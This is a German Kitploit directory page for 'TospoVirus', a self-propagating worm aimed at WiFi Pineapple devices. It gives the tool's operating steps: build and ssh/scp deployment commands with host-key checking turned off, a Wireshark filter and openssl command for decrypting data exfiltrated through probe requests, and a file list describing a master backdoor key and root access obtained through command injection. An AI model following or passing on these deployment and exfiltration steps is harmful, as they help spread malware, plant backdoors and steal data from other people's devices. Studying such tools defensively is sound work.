Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
TospoVirus — Ein WiFi-Pineapple-Wurm, der Systeme infiziert. | Kitploit
Tools/GitHubGitHub/catatonicprime/tospovirus
PersistenzmechanismenExploitationLaterale BewegungDatenexfiltrationPost-ExploitationDrahtlose SicherheitCommand and ControlRemote-Access-Trojaner
GitHubcatatonicprime/tospovirus

TospoVirus

Ein WiFi-Pineapple-Wurm, der Systeme infiziert.

Repository anzeigen
17421vor 11 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

TospoVirus für die Verteilung erstellen:

./build.sh

An eine funktionierende Pineapple mit Version 2.3 verteilen:

ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null [email protected] "mkdir /tospo"
scp -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null dist/tv* [email protected]:/tospo/
Hinweis: Sie benötigen ein konfiguriertes Gerät ODER verwenden Sie das Metasploit-Modul, um SSH zu aktivieren.

Entschlüsseln exfiltrierter Daten:

Der Wireshark-Filter lautet:
(wlan.fc.type_subtype == 0x04) && (wlan_mgt.tag.length == 32)
printf $(echo "[data copied from wireshark]" | sed -re 's/(..)/\\x\1/g') | openssl rsautl -decrypt -inkey tvd.pem

Optional können Sie das harvest.py-Skript wie folgt verwenden:
python harvest.py [monitor-iface]

Dateien & Zweck:

Tool herunterladen
FileZweck
tvDas Virus selbst.
tvbdDer "Master"-Backdoor-Schlüssel, verteilen Sie den privaten Schlüssel nicht.
tvdDer Offenlegungsschlüssel, der zum Exfiltrieren von Daten über Probe Requests verwendet wird.
tospo_rsaDer private Identitätsschlüssel, spezifisch für jedes infizierte Gerät, verwendet als Übertragungsschlüssel.
tospo_rsa.pubDer öffentliche Identitätsschlüssel, der über die Command-Injection-Seite übertragen wird, damit die private Identität Aktionen als Root auf dem entfernten Gerät ausführen kann.
wÜbertragene Wireless-Konfigurationsoptionen, verwendet zum Wiederherstellen vorheriger Verbindungen.
nÜbertragene Netzwerkkonfigurationsoptionen, verwendet zum Wiederherstellen vorheriger Verbindungen.
Hinweis: Alle Dateien, die mit 'tv' beginnen, werden beim Infizieren eines neuen Geräts übertragen. Fügen Sie keine privaten Schlüssel oder Ähnliches mit Namen hinzu, die mit 'tv' beginnen, sonst wird Ihr privater Schlüssel der forensischen Analyse ausgesetzt.